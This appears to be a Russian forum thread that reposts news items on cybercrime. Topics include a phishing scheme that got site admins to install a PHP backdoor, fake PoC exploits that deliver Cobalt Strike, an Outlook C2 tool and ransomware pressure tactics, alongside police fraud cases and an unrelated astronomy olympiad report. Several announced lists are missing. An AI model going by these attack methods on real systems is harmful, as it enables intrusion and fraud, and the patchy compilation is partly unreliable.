Работа “лицемерные коммиты” проводилась в августе 2020 года и была направлена на повышение безопасности процесса установки исправлений в Linux. В рамках проекта мы изучили потенциальные проблемы с процессом установки исправлений, включая причины возникновения проблем, и предложили методы их устранения.
Наше исследование не привнесло уязвимости в код Linux. Три некорректных патча лишь подверглись обсуждению, но не продвинулись дальше этого, они не попали в код. Мы изложили результаты и свои выводы (за исключением некорректных патчей) в нашей работе для сообщества Linux перед публикацией статьи, собрали отзывы и включили их в публикацию», — гласит письмо представителей университета.Click to expand...
Сейчас в университете проводится разбирательство, ведь, к примеру, эта работа по какой-то причине не была классифицирована, как исследование на людях.
Что до извинений, Кроа-Хартман, похоже, не слишком впечатлен открытым письмом:
«Как вам известно, в пятницу Linux Foundation и Technical Advisory Board направили вашему университету письмо с изложением конкретных действий, которые нужно предпринять, чтобы ваша группа и ваш университет смогли восстановить доверие сообщество ядра Linux. Пока не будут предприняты эти действия, нам больше нечего обсуждать», — пишет он.
Click to expand...
Источник: xakep.ru/2021/04/27/hypocrite-commits/
Сайты более 100 российских компаний могли быть взломаны в результате новой мошеннической рассылки, сообщает «Лаборатория Касперского». Злоумышленники целенаправленно атаковали администраторов сайтов. Целью этой кампании было заражение ресурсов, которыми управляют жертвы.
Злоумышленники выдавали себя за регулирующий орган и рассылали мошеннические уведомления о необходимости подтвердить факт управления доменным именем. В фальшивом письме приводится инструкция, согласно которой нужно создать в корневой директории сайта файл с определенным содержимым, а на самом деле — запустить бэкдор, написанный на языке PHP. Если жертва соглашалась, злоумышленники получали доступ к управлению сайтом: получали возможность создавать страницы, размещать любую информацию, загружать файлы.
К настоящему моменту «Лаборатория Касперского» обнаружила около 4000 таких писем, отправленных более чем на 2000 email-адресов. Пик рассылки пришелся на 16-17 апреля, но сообщения продолжают приходить и по сей день.
По мнению экспертов, рассылка направлена в основном на владельцев и сотрудников малого бизнеса. Судя по всему, злоумышленники рассчитывают на то, что у целей недостаточно знаний в области ИТ и управления сайтами, чтобы оценить ущерб от выполнения действий, о которых говорится в инструкции.
«Администраторы сайтов часто подвергаются атакам, например, у них вымогают деньги путем рассылки фейковых уведомлений о близящемся сроке завершения аренды сайта. Но на этот раз цель атаки — получение доступа к управлению сайтами. Злоумышленники прилагают все усилия, чтобы убедить получателей в подлинности письма: отправителем значится регулирующий орган, для усиления эффекта добавлена соответствующая эмблема. Кроме того, чтобы не дать получателю время заподозрить неладное, от него требуют выполнить инструкцию в сжатые сроки, — рассказывает Александр Лискин, руководитель лаборатории антивирусных исследований «Лаборатории Касперского». — Мы настоятельно рекомендуем сохранять бдительность при получении сообщений от незнакомых отправителей в электронной почте и мессенджерах и перепроверять информацию якобы от официальных органов».
Click to expand...
Источник: xakep.ru/2021/04/26/site-admins-attack/
Студент Хавьер Юсте (Javier Yuste) из мадридского Университета имени Короля Хуана Карлоса создал бесплатный инструмент AvaddonDecrypter, предназначенный для дешифровки файлов, пострадавших от вымогателя Avaddon.
Это решение могло помочь лишь новым жертвам вредоноса и работало лишь в том случае, если пострадавшие не выключили свои компьютеры после атаки. Так, AvaddonDecrypter делал дамп ОЗУ зараженной системы и просматривал содержимое памяти в поисках данных, которые можно было бы использовать для восстановления исходного ключа шифрования. Если ключ удавалось воссоздать, становилась доступна бесплатная расшифровка файлов.
К сожалению, разработчики малвари быстро заметили релиз AvaddonDecrypter. В середине текущей недели злоумышленники сообщили, что обновили код своего шифровальщика таким образом, чтобы AvaddonDecrypter престал работать.

Оперативная реакция злоумышленников дала новый виток многолетнему спору, который давно ведут между собой ИБ-специалисты. Так, некоторые эксперта убеждены, что дешифровщики, которые эксплуатируют различные ошибки в коде малвари, должны оставаться конфиденциальными и распространяться среди пострадавших только по закрытым каналам. В том случае, если такие инструменты все же должны быть обнародованы, их публикация не должна сопровождаться какими-либо техническими деталями и данными, которые подскажут злоумышленникам, как лучше исправить собственный код.
Если же дешифровщик построен на базе мастер-ключей дешифрования, полученных с серверов хакеров, он может быть опубликован в открытом доступе, так как с подобными инструментами преступники ничего поделать не могут.
__https://twitter.com/x/status/1359061622808018944
Источник: xakep.ru/2021/02/12/avaddondecrypter/
Исследователи Infoblox выявили группировку Revolver Rabbit, которая зарегистрировала более 500 000 доменов для вредоносных кампаний против пользователей Windows и macOS.
Click to expand...
Эксперты рассказывают, что хакеры применяют алгоритмы для генерации регистрируемых доменов (RDGA), то есть автоматически регистрируют множество доменных имен за короткий период времени.
Суть RDGA схожа с методом DGA, который используется малварью для создания списков возможных мест расположения управляющих серверов. Разница заключается в том, что DGA встраивается непосредственно в код вредоносов и регистрирует только некоторые из сгенерированных доменов, тогда как RDGA работает на стороне злоумышленников и регистрирует все генерируемые домены.
И если исследователи могут обнаружить DGA, а затем с помощью реверс- инжиниринга узнать адреса возможных управляющих серверов, в случае RDGA все секретно, а поиск шаблона для генерации доменов становится более сложной задачей.
По данным компании, группировка контролирует более 500 000 доменов верхнего уровня .BOND, которые используются для создания как ложных, так и реальных управляющих серверов для вредоносного ПО. При этом в Infoblox отмечают, что домены в зоне .BOND просто легче всего обнаружить, но в общей сложности хакеры уже зарегистрировали более 700 000 доменов в самых разных зонах.
Исследователи подсчитали, что Revolver Rabbit использует RDGA для покупки сотен тысяч доменов, и ее расходы уже превысили 1 млн долларов США, учитывая, что один домен .BOND стоит около 2 доллара США.
В своих операциях хакеры распространяют малварь XLoader, которая способна воровать конфиденциальную информацию и выполнять вредоносные файлы в системах под управлением Windows и macOS.
Домены, как правило, сфокусированы на определенной тематике или регионе и отличаются большим разнообразием. Вот несколько примеров:
Исследователи пишут, что отслеживают Revolver Rabbit уже около года, но
использование RDGA скрывало цели злоумышленников до недавнего времени.
Источник - Hack-lair
Исследователи Cyble обнаружили вредоносную кампанию, нацеленную на представителей Infosec-сообщества, в рамках которой используется поддельным PoC-эксплойт для доставки Cobalt Strike.
Все началось с сообщения в Twitter, автор которого разоблачил малварь, замаскированный под эксплойт Proof of Concept для уязвимости удаленного выполнения кода RPC Runtime Library (CVE-2022-26809 с оценкой CVSS 9.8), который распространяли таким образом через GitHub.
В ходе расследования нашелся и другой замаскированный под POC-эксплойт для CVE-2022-24500 вредоносный образец, который также размещался в GitHub. При этом оба репозитория принадлежат одному и тому же владельцу, являющемуся главным актором всей кампании. Кроме того, ресерчеры отследили обсуждения, которые инициировали злоумышленники на ИБэшных форумах для распространения вредоносных ПО под видом PoC.
Анализ образцов ПО показал, что они представляют собой двоичный файл .Net, упакованный ConfuserEX, при этом никаким образом не содержат в коде ни строчки упомянутых в PoC уязвимостей. По факту малварь визуально имитирует попытку эксплуатации уязвимости, запуская в фоне шелл-код.
Программа выполняет команду PowerShell с помощью cmd.exe для доставки фактической полезной нагрузки, которая представляет собой Cobalt-Strike. Затем злоумышленники могут использовать его для загрузки дополнительных полезных данных и выполнения боковых перемещений.
Присоединяемся к Cyble и категорически настаиваем на предварительной проверке достоверности и надежности источников. В этом плане [подготовленный исследователями отчет](https://blog.cyble.com/2022/05/20/malware-campaign- targets-infosec-community-threat-actor-uses-fake-proof-of-concept-to-deliver- cobalt-strike-beacon/?utm_ss=szQyNDAzMTE1BAA&utm_ss_social=1) будет полезен с точки зрения общих рекомендаций, а также в нем представлены индикаторами компрометации (IoC) касательно выявленной кампании.
Россия в третий раз выступила организатором Открытой международной астрономической олимпиады. Состязание прошло с 15 по 22 сентября на федеральной территории «Сириус» и объединило представителей 20 государств, среди которых – Катар, Эфиопия, Белоруссия, Болгария, Перу и другие. Все участники сборной России завоевали золотые медали.
Российских школьников поздравил Заместитель Председателя Правительства Дмитрий Чернышенко.
«Поздравляю российских школьников с блестящей победой! Радует, что такие высокие результаты становятся доброй традицией. Открытая международная астрономическая олимпиада проводится в третий раз, и каждый год наши участники выигрывают золотые медали. Мы благодарим победителей за упорство и стремление к знаниям, а их родителей, учителей и наставников – за поддержку и крепкие знания. Наш Президент Владимир Путин одной из национальных целей обозначил реализацию потенциала каждого человека и развитие его талантов. Ребята своим примером показывают, что российские школьники действительно обладают большими способностями и возможностями. Молодцы, так держать!» – отметил вице-премьер.
Золотые медали всем победителям вручил Министр просвещения РФ Сергей Кравцов.
«Дорогие ребята, когда вы вырастете, вы будете развивать нашу страну и двигать её вперёд. Желаю вам никогда не останавливаться на достигнутом. Чтобы, выбрав астрономию, вы продолжили свой путь именно в этой науке. Сегодня такие научные исследования крайне необходимы миру. И никогда не забывайте ту атмосферу дружбы и взаимопомощи, которая в течение недели царила в „Сириусе“», – сказал Сергей Кравцов.
Он также поблагодарил руководителя образовательного центра «Сириус» Елену Шмелёву и всю её команду за организацию на высоком уровне третьей Открытой международной астрономической олимпиады. Центр «Сириус» совместно с Минпросвещения России принимает участие в подготовке школьников к международным олимпиадам.
«Открытая международная астрономическая олимпиада транслирует лучшие традиции российской астрономической школы. Олимпиада укрепляет дружбу между школьниками из разных стран, помогает развивать международное сотрудничество с педагогами и научными сообществами из других государств, способствует обмену опытом и педагогическими методиками. В будущем это позволит формировать научные сообщества, в которые входят ведущие учёные разных стран. Рада, что „Сириус“ стал уникальной и эффективной площадкой для научной подготовки самых сильных и целеустремлённых школьников со всего мира», – подчеркнула Елена Шмелёва.
Золотые медали завоевали:
• Ольга Карасева, общеобразовательная школа Центра педагогического мастерства, Москва.
• Егор Леденев, школа «Летово», Москва.
• Татьяна Мигаль, лицей города Истра, Московская область.
• Дмитрий Тимофеев, общеобразовательная школа Центра педагогического мастерства, Москва.
• Екатерина Чуркина, школа №179, Москва.
• Марк Яковлев, школа №179, Москва.
Екатерина Чуркина стала абсолютным победителем олимпиады, набрав наибольшее количество баллов. Она также была удостоена почётного звания «Национальный бриллиант».
Руководитель сборной – Борис Эскин, старший преподаватель кафедры небесной механики математико-механического факультета Санкт-Петербургского государственного университета. Заместители руководителя – Мария Волобуева, педагог Президентского физико-математического лицея №239, и Иван Утешев, методист Центра педагогического мастерства.
Олимпиада состояла из четырёх туров: теоретического, практического, наблюдательного и тестового. Школьники работали с задачами на знание звёздного неба, анализировали научный материал – таблицы и графики, делали расчёты и прогнозы. В свободное от соревновательных туров время ребята знакомились с известными учёными и космонавтами.
В 2024 году Открытая международная астрономическая олимпиада (OWAO) прошла в третий раз. В 2023 году российские школьники получили шесть золотых медалей, став абсолютными победителями по количеству набранных баллов.
• Source: https://t.me/siriusfederal/5809
Как хакеры используют Outlook для удалённого управления
На днях компания TrustedSec
представила новый инструмент для
атак на Microsoft Outlook, названный «Specula». Этот инструмент позволяет
злоумышленникам удалённо выполнять код, используя Outlook как платформу для
управления и контроля (C2).
🛡 Основой для работы Specula является уязвимость CVE-2017-11774, которая была исправлена Microsoft в октябре 2017 года. Данный недостаток безопасности позволяет обойти защитные механизмы Outlook и создать кастомную домашнюю страницу, используя WebView.
Согласно данным Microsoft, злоумышленники могут предоставлять специально
созданные документы, эксплуатирующие эту уязвимость. Открытие таких документов
пользователями может привести к компрометации системы.
Сотрудниками Отдела по борьбе с противоправным использованием информационно- коммуникационных технологий МВД по Республике Карелия установлен подозреваемый в серии мошеннических действий. В числе пострадавших не только жители республики, но и других регионов.
В конце 2023 года в полицию Петрозаводска поступило заявление от жителя города. Он сообщил о том, что кто-то взломал сервис «личный кабинет» на портале Госуслуг, а затем от его имени оформил микрозайм в размере 7 000 рублей. К делу подключились сотрудники по работе с киберпреступлениями. В ходе оперативно-розыскных мероприятий они вышли на след возможного подозреваемого - 22-летнего жителя Уфы.
В ходе служебной командировки карельские полицейские разыскали и задержали гражданина, который сознался в инкриминируемом преступлении. Он рассказал о том, что аналогичным образом обманул еще несколько жителей Карелии, Башкортостана и других регионов страны. Предварительная сумма ущерба составляет около 400 000 рублей, деньги подозреваемый тратил на себя.
По фактам мошенничества и неправомерного доступа к компьютерной информации возбуждены уголовные дела. Полиция устанавливает других лиц, пострадавших в результате преступных действий подозреваемого.
С англичанином «Джеймсом» 27-летняя жительница областного центра познакомилась через один из мессенджеров в мае этого года: он написал женщине, что она ему очень понравилась.
На днях мужчина отправил посылку из Великобритании, в которую якобы положил сумку, телефон и деньги. Ровенчанка настолько увлеклась хорошим жестом ухажера: и то, что подарок прибыл в аэропорт Ивано-Франковска, ее не насторожило.
В дальнейшем начались якобы проблемы: охранники в аэропорту «просветили» пакет и обнаружили там 20 000 долларов США. Чтобы не сообщать в полицию, нужно было заплатить: сначала 62 тысячи гривен, а потом, в течение дня, еще разные суммы. Следовательно, в целом женщина перечислила 173 тысячи гривен.
Затем появился юрист, который сообщил, что нужно купить право собственности на посылку и перечислить еще 285 тысяч гривен. Женщина выполнила и это условие.
Опомнилась лишь тогда, когда позвонила к отцу, чтобы одолжить очередную сумму, которую требовали мошенники. Именно он и забил тревогу.
В области это уже третья женщина, которая попала на крючок афериста «Джеймса» в этом году.
Компания Google выпустила исправления для уязвимостей в своих устройств Pixel и предупредила, что одна из проблем уже использовалась в целевых атаках, в качестве бага нулевого дня.
Уязвимость получила идентификатор CVE-2024-32896 и представляет собой проблему повышения привилегий в прошивке Pixel, то есть относится к категории проблем высокой степени серьезности.
«Есть признаки того, что CVE-2024-32896 может подвергаться ограниченной целенаправленной эксплуатации, — предупредили в компании. — Все поддерживаемые устройства Google получат обновление до уровня патча 2024-06-05. Мы рекомендуем всем пользователям установить эти обновления на свои устройства».
Click to expand...
Никаких подробностей о самой проблеме, а также об атаках, в которых она использовалась, пока не сообщается.
Также среди обновлений для Pixel, вышедших в этом месяце, месяце Google выделила 44 других ошибки, семь из которых являются уязвимостями повышения привилегий и считаются критическими, влияя на различные компоненты (включая LDFW, Goodix, Mali, avcp и Confirmui).
Отметим, что в апреле Google исправила еще две 0-day проблемы в Pixel, которые, как оказалось, использовались киберкриминалистами для разблокировки телефонов без PIN-кода и получения доступа к хранящимся на них данным. Так, CVE-2024-29745 описывалась как серьезный недостаток, связанный с раскрытием информации в загрузчике Pixel, а проблема CVE-2024-29748 была обнаружена в прошивке Pixel и ее связывали с повышением привилегий.
На заседании Коллегии МВД России Министр внутренних дел Российской Федерации генерал полиции Российской Федерации Владимир Колокольцев отметил, что на сегодняшний день нормативно не урегулирована ситуация с обналичиванием дистанционно похищаемых денежных средств при помощи счетов третьих лиц – так называемых дропов. При этом в подобные схемы вовлечено большое количество людей, включая молодежь.
В качестве примера Глава МВД России сообщил о пресечении деятельности одной из таких группировок:
«Сотрудники Управления по борьбе с противоправным использованием информационно-коммуникационных технологий Главка по городу Санкт-Петербургу и Ленинградской области задержали группу местных жителей от 19 до 23 лет, подозреваемых в мошенничестве. Они подыскивали граждан, готовых предоставить свои банковские карты, обналичивали поступавшие на них похищенные деньги, а затем переводили зарубежным сообщникам. Установлена причастность фигурантов к совершению не менее 80 преступлений с ущербом на десятки миллионов рублей».
Предварительно установлено, что противоправная деятельность началась в середине прошлого года. Криминальный заработок злоумышленники нашли через Интернет и исполняли указания анонимных кураторов из-за границы.
Как выяснилось, задержанные были вовлечены в криминальную схему, которая начиналась с рассылки в мессенджере предложения проголосовать за участника конкурса. Те, кто соглашались выполнить эту просьбу и проявляли невнимательность, непреднамеренно отправляли мошенникам код восстановления доступа к своей учетной записи. Таким образом они предоставляли аферистам возможность рассылать от их имени сообщения с просьбой срочно одолжить деньги. Эти средства поступали на привязанные к платежным картам счета и обналичивались фигурантами.
Территориальными подразделениями МВД России возбуждены уголовные дела по признакам преступлений, предусмотренных статьями 158 и 159 УК РФ. B ходе обысков у задержанных изъято 26 смартфонов, 215 сим-карт, 42 банковские карты, семь единиц компьютерной техники.
Четверым фигурантам избрана мера пресечения в виде подписки о невыезде и надлежащем поведении, один находится под домашним арестом.
+++++
Колокольцев провел заседание коллегии МВД России, посвященное противодействию IT-преступности
«Под председательством Министра внутренних дел Российской Федерации генерала полиции Российской Федерации Владимира Колокольцева прошло заседание коллегии МВД России, посвященное вопросам противодействия IT-преступлениям», – сообщила официальный представитель МВД России Ирина Волк.
Глава ведомства назвал данную тему крайне важной и напомнил, что, учитывая степень угрозы, соответствующая задача включена в национальные цели развития Российской Федерации, которые месяц назад определены Указом Президента.
Министр привел ряд статистических данных:
«С 2020 года количество посягательств с использованием информационных технологий увеличилось на треть. Доля дистанционных деяний в общем массиве сейчас приближается к 40%. В прошлом году от них пострадало полмиллиона человек, из которых практически каждый четвертый – пенсионер. Уже в этом году жертвами различных уловок преступников стали более 40 тысяч граждан преклонного возраста. Существенным является размер причиненного ущерба. Суммарно за 2023-й и четыре месяца текущего года он превысил 210 миллиардов рублей».
Владимир Колокольцев подчеркнул:
«За сухими цифрами стоят личные трагедии людей, лишившихся многолетних накоплений, попавших в долговую кабалу».
Глава МВД России рассказал, что меняется структура IT-преступлений, постоянно появляются новые способы совершения таких посягательств. В криминальные схемы обналичивания дистанционно похищаемых денежных средств через счета третьих лиц вовлечено большое количество людей, включая молодежь. Несмотря на снижение доли коммуникаций посредством «подменной» телефонии, полностью такие факты не исключены. Кроме того, с целью обмана преступники используют так называемые сим-боксы, возможности виртуальных автоматических телефонных станций, фиктивные биржевые площадки, «криптообменники», «теневые» маркетплейсы.
«В прошлом и текущем годах фиксируется всплеск фактов неправомерного доступа к
компьютерной информации. Если в 2020 году их доля среди дистанционных составов
не превышала одного процента, то сейчас это каждое восьмое IT-деяние»,
– констатировал Глава ведомства.
Владимир Колокольцев сообщил, что Министерство внутренних дел и все заинтересованные ведомства принимают необходимые меры для противодействия этим вызовам, ведется работа по совершенствованию законодательства. При участии МВД России урегулирован ряд важных вопросов, включая пресечение использования подмены телефонных номеров, приостановление сомнительных денежных операций, выработаны дополнительные механизмы защиты финансовых активов граждан, возмещения причиненного ущерба. Серьезное внимание уделяется повышению «цифровой» грамотности населения.
В территориальных органах МВД России созданы специализированные подразделения, штатная численность которых с 2020 года увеличилась в пять раз. Совершенствуются алгоритмы подготовки сотрудников, оптимизированы методы расследования с учетом меняющихся способов дистанционных преступлений. Координация деятельности в указанной сфере возложена на профильное управление, которое образовано в центральном аппарате ведомства.
Участники заседания детально обсудили актуальные аспекты сотрудничества с другими федеральными органами исполнительной власти, регуляторами, операторами сотовой связи, кредитными организациями, интернет-провайдерами, определили дополнительные меры по противодействию IT-преступности.
Продавцы изменяли алгоритмы рекламы на Wildberries, причиняя серьезные убытки.
Компания Wildberries рассказала о своих убытках в 650 млн руб. из-за незаконных методов продвижения товаров на своей платформе. Эти методы были выявлены специалистами по безопасности онлайн-площадки, которые обратились в правоохранительные органы с заявлением о возбуждении уголовного дела по факту мошенничества в особо крупном размере. Точная сумма ущерба будет определена в ходе следствия.
Wildberries также рассказала, что около 300 продавцов настраивали рекламу на платформе через бот в Telegram, но не платили за нее. Компания потребует от них оплатить полную стоимость рекламы на площадке. По информации компании, таких продавцов было около 300 человек. Им предъявят требование об оплате полной стоимости рекламы на площадке.
В Wildberries также опровергли информацию о взломе базы данных, которую ранее распространил Telegram-канал Mash. Проект заявлял, что из-за действия вредоносного ПО компания потеряла 650 млн руб.
Ранее Telegram-канал Shot со ссылкой на источник сообщил, что сотрудники Wildberries с января 2022 года меняли цены на дорогие товары, а потом покупали их по низкой стоимости, продвигая товар на площадке. Позже проект со ссылкой на Wildberries сообщил, что основной ущерб из 650 млн руб. был нанесен около 300 продавцами, которые через бот в Telegram изменяли алгоритмы рекламы на Wildberries.
Wildberries обратилась в правоохранительные органы с просьбой возбудить уголовное дело из-за мошенничества в особо крупном размере. Продавцы, которые воспользовались нелегальным продвижением, должны будут оплатить рекламу в полном объеме, а также участвовать в следствии. За ущерб Wildberries на 650 млн рублей злоумышленников могут привлечь по ст. 165 УК РФ, предусматривающей ответственность за причинение имущественного ущерба путем обмана при отсутствии признаков хищения (максимальный срок лишения свободы по данной статье — до пяти лет).
Cегодня возле бизнес-центра "Демидов", который находится неподалеку от станции метро "Парк культуры" и в котором расположен один из офисов Wildberries, собралась группа недовольных продавцов. Они утверждают, что им были выставлены огромные счета за рекламу товаров. В общей сложности, продавцы говорят, что они задолжали компании около 2 миллиардов рублей. Возмущенные продавцы вошли в бизнес-центр и начали скандировать требования вернуть их деньги.
Сотрудники полиции задержали двух жителей Карачаево-Черкесии, которые подозреваются в нелегальном обналичивании более 9 млрд рублей. Об этом ТАСС сообщили в пресс-службе республиканского МВД.
"По подозрению в незаконной банковской деятельности задержаны 60-летний житель Черкесска и 63-летний житель аула Кумыш. За время осуществления незаконной банковской деятельности нелегальный денежный оборот черных банкиров превысил 9 млрд рублей, а доход "финансистов" составил несколько сотен миллионов рублей",
В МВД добавили, что для проведения нелегальных банковских операций злоумышленники использовали фирмы-однодневки, деньги они перечисляли на счета подконтрольных юридических лиц по фиктивным основаниям. С каждой сделки подозреваемые получали определенный процент.
В настоящее время в отношении задержанных, а также пока не установленных следствием лиц возбуждено уголовное дело о незаконной банковской деятельности (ч. 2 ст. 172 УК РФ). "Во время обысков в жилищах фигурантов и используемых ими офисах полицейскими изъяты компьютеры и ноутбуки, носители электронной информации, мобильные телефоны, печати и штампы различных организаций, банковские карты и другие предметы", - добавили в полиции. Другие участники преступной группы устанавливаются.
source: tass.ru/proisshestviya/13914821
За первое полугодие 2021 года в России зарегистрировано более 84 тыс. IT-краж и свыше 117 тыс. IT-мошенничеств, сообщил в интервью РИА Новости заместитель министра внутренних дел РФ – начальник Следственного департамента МВД РФ генерал-лейтенант юстиции Сергей Лебедев.
«Если под кибермошенничеством понимать любые хищения, совершенные дистанционно, с использованием Интернета, телефонной или иных видов связи, то могу сказать, что за шесть месяцев 2021 года зарегистрировано свыше 84 тысяч IT-краж (плюс 11,1% по сравнению с аналогичным периодом прошлого года) и свыше 117 тысяч IT-мошенничеств (плюс 12,8%)», – сказал он.
Лебедев добавил, что органы предварительного следствия организуют работу по расследованию и раскрытию преступлений как по уголовным делам, которые возбуждены в текущем году, так и по делам прошлых лет, в том числе по которым приостановлено предварительное следствие. «В текущем году только с квалификацией «мошенничество» раскрыто и окончено расследование по 1,7 тысячи таких преступлений, совершенных в прошлые годы», – отметил он.
Генерал-лейтенант уточнил, что всего в первом полугодии 2021 года следователи окончили расследование более 30 тыс. «киберхищений», к уголовной ответственности привлечено почти 23 тыс. лиц.
• Source: https://ria.ru/20210820/kibermoshennichestvo-1746425415.html
Следователи Главного следственного управления Нацполиции закончили досудебное расследование в уголовном производстве в отношении преступной группы, которая похищала денежные средства с банковских счетов юридических лиц, используя вредоносные программные средства. Злоумышленникам грозит до 12 лет заключения.
Противоправную деятельность преступной группы разоблачили работники Департамента киберполиции совместно с Главным следственным управлением Нацполиции.
Установлено, что пятеро злоумышленников создали и модифицировали вредоносное программное обеспечение, с помощью которого получали доступ к банковским программам электронных платежей «Клиент-банк» и «Интернет клиент-банк». Вирусное программное обеспечение присылали на электронные ящики различных предприятий.
После его попадания на технику - отслеживали поступление денег на банковские счета, осуществляли вмешательство в работу программ и несанкционированно перечислили деньги на подконтрольные счета. Таким образом участники группировки присвоили более 3 миллионов гривен.
Сейчас следователи полиции досудебное расследование в уголовных производствах по ч. 5 ст. 185 (кража), ч. 2 ст. 361-1 (Создание с целью использования, распространения или сбыта вредоносных программных или технических средств)2 ст. 361 (Несанкционированное вмешательство в работу компьютеров, автоматизированных систем, компьютерных сетей или сетей электросвязи)3 ст. 209 (Легализация (отмывание) имущества, полученного преступным путем) Уголовного кодекса Украины завершено. Обвинительный акт направлен в суд.
Фигурантам может грозить до двенадцати лет лишения свободы с конфискацией имущества.
«Лаборатория Касперского» продолжает наблюдать за хак-группой WildPressure, [впервые замеченной](https://securelist.com/wildpressure-targets-industrial- in-the-middle-east/96360/) в 2020 году. Операторы группировки используют троян Milum для атак на цели на Ближнем Востоке (предположительно связанные с нефтегазовой отраслью).
Помимо версий малвари, написанных на C++, эксперты компании зафиксировали атаки с использованием схожих версий на Visual Basic Script и Python. Последняя вариация [может заражать](https://securelist.com/wildpressure- targets-macos/103072/) как Windows-системы, так и системы на базе macOS. Все три модификации способны собирать данные о жертве, загружать файлы и выполнять команды оператора.
Исследователи отмечают, что мультиплатформенная малварь, которые способна заражать устройства на macOS, встречается редко. Так, в случае с Windows Python-скрипт с названием Guard доставлялся внутри исполняемого файла. У потенциальных жертв, работающих на этой ОС, не обязательно должен быть установлен интерпретатор Python. В случае мacOS вредонос распространяется с предустановленным интерпретатором. Системно-зависимый код трояна относится к методам закрепления в системе и сбору данных о ней. Например, Python-скрипт проверяет, установлены ли на устройстве защитные решения.
«Операторы WildPressure разработали схожие версии троянцев как минимум на трех языках. Возможно, это было сделано для того, чтобы затруднить его детектирование. Мы нечасто видим вредоносное ПО, которое адаптировано для заражения двух разных операционных систем, даже и в виде Python-скрипта. Любопытно также, что второй целевой системой выбрана именно macOS, в зоне интересов WildPressure она явно не первая, приходящая на ум», — комментирует Денис Легезо, старший эксперт по кибербезопасности «Лаборатории Касперского».
Click to expand...
Эксперты Check Point подготовили [отчет](https://blog.checkpoint.com/2021/04/15/microsoft-continues-to-be-most- imitated-brand-for-phishing-attempts-in-q1-2021/) о брендах, которые чаще всего использовались в фишинговых атаках в первом квартале 2021 года. В него вошли компании, которые чаще всего имитировали киберпреступники, чтобы расположить к себе пользователей и получить нужную информацию.
Чаще всего во время таких атак злоумышленники пытаются имитировать официальный сайт известной компании, используя доменное имя, URL-адрес и дизайн, аналогичные оригинальным. Жертвы могут получить ссылку на фейковую страницу по электронной почте или SMS. Также они могут быть перенаправлены на фишинговый сайт во время просмотра страниц в сети или из вредоносного мобильного приложения. Cайты-фальшивки часто содержат форму, предназначенную для кражи учетных или платежных данных, а также другой личной информации
В первом квартале 2021 года, равно как и в предыдущем, злоумышленники чаще всего использовали бренд Microsoft. 39% всех попыток фишинга с упоминанием известных компаний были связаны именно с этой компанией (немного меньше, чем в четвертом квартале – тогда этот показатель составлял 43%). Это показывает, что киберпреступники все еще нацелены на тех, кто работает удаленно.
На втором месте стоит компания DHL (18% всех попыток): хакеры продолжают использовать растущий спрос на покупки в сети.
Отчет компании демонстрирует, что с наибольшей вероятностью хакеры и далее будут эксплуатировать ИТ-сферу. Также интересно, что на третьем месте банковская сфера – в этот раз она заменила розничную торговлю в топе лидеров, так как два банковских бренда, Wells Fargo и Chase, вошли в первую десятку.
Это показывает, как злоумышленники используют для своих целей рост цифровых
платежей, зависимость от онлайн-банкинга, покупок в сети и доставки на дом.
Топ брендов, которые злоумышленники чаще всего использовали в фишинговых
атаках:
Исследователи приводят несколько примеров фишинговых посланий, эксплуатирующих известные бренды. К примеру, эксперты прилагают к отчету фишинговое письмо, в котором использовался бренд DHL. Послание пыталось загрузить троян удаленного доступа (Agent Tesla) на компьютер пользователя.
Электронное письмо с темой «DHL Import Clearance - Consignment:
Другое письмо было ориентировано на кражу данных учетной записи пользователя Wells Fargo. Оно пришло с поддельного адреса noreply@cc.wellsfargo.com и имело тему «Your Online access has been disabled» («Ваш доступ в интернет отключен»). Злоумышленник пытался заставить жертву перейти по вредоносной ссылке, которая перенаправляет пользователя на мошенническую страницу, которая выглядит как настоящий сайт Wells Fargo. После перехода по ссылке пользователю предлагалось ввести свой логин и пароль.
Источник: xakep.ru/2021/04/16/most-imitated-brands/
Серебряный призер Олимпиады-2022 в составе французской биатлонной команды и двухкратная чемпионка мира Жюли Симон (Julia Simon) может быть причастна к мошенничеству с банковскими картами. При этом пострадавшей стала ее партнер по сборной Франции, чемпионка тех же Олимпийских игр Жюстин Брезаз-Буше (Justine Braisaz-Bouchet).
Симон была задержана жандармерией прямо на базе сборной Франции в Альбервиле. Теперь ей придется в личном разговоре со следователями объяснить, каким образом с использованием банковской карты Брезаз-Буше были оплачены товары, которые затем доставили домой к Симон. Речь идет о продукции бренда Go Pro, стоимостью в несколько тысяч евро.
Инциденты, судя по всему, имели место в январе и июне 2022 года, однако лишь одна из поданных жалоб имеет отношение к партнеру Симон по сборной. Имя второго пострадавшего не разглашается.
«Эта ситуация выше моего понимания… Я думаю, что мою личность украли», — сказала Симон журналистам.
Уголовное дело именно против Симон пока не возбуждалось. Однако если это произойдет, существует вероятность, что прославленная биатлонистка и одна из главных звезд сборной отправится под трибунал. Во Франции все представители этого вида спорта формально являются действующими военнослужащими.
source: ledauphine.com/faits-divers-justice/2023/10/24/escroquerie-a-la-cb- julia-simon-placee-en-garde-a-vue
Жертвы утечек теперь поймут, что хакеры не шутят.
Группировка ALPHV/BlackCat пытается оказать большее давление на своих жертв, предоставляя API для своего сайта утечки, чтобы повысить видимость своих атак.
Исследователи безопасности VX-Underground заметили , что сайт утечки данных ALPHV/BlackCat добавил новую страницу с инструкциями по использованию их API для сбора своевременных обновлений о новых жертвах.
Банда вымогателей опубликовала вызовы API, которые помогут получить различную информацию о новых жертвах или обновлениях, начиная с определенной даты. Группа также предоставила сканер, который даёт актуальную информацию о жертве утечки данных.
BlackCat не объяснила причину выпуска API, но исследователи считают, что это сделано для того, чтобы оказать давление на жертв и заставить их выплатить выкуп, так как в последнее время всё меньше жертв поддаются требованиям программ-вымогателей.
По статистике аналитической компании Chainalysis, доходы вымогателей от выкупов в 2022 году упали практически на 40% . Кибербандиты по всему миру смогли суммарно заполучить около $457 млн. в 2022 году. Когда как в 2020 и 2021 эти цифры стремились к $800 млн.
Кроме того, исследователи кибербезопасности начали замечать, что вымогательская группировка Clop скопировала тактику своих конкурентов из группы ALPHV и создала открытые веб-сайты утечки , доступные без Tor- подключения и посвящённые конкретным организациям-жертвам. Таким образом злоумышленники пытаются ускорить утечку похищенных данных и давить на жертв, чтобы те быстрее заплатили выкуп.
Злоумышленники вводили жертв в заблуждение с помощью фальшивых графиков, показывающих прибыль от торговли финансовыми активами.
45-летний израильтянин признался в мошенничестве в отношении инвесторов из Германии, Австрии и других стран через call-центры, работающие из городов Восточной Европы. Мужчина помог украсть почти $10 млн у сотен жертв масштабной аферы кибертрейдинга, находясь под воздействием кокаина и виски.
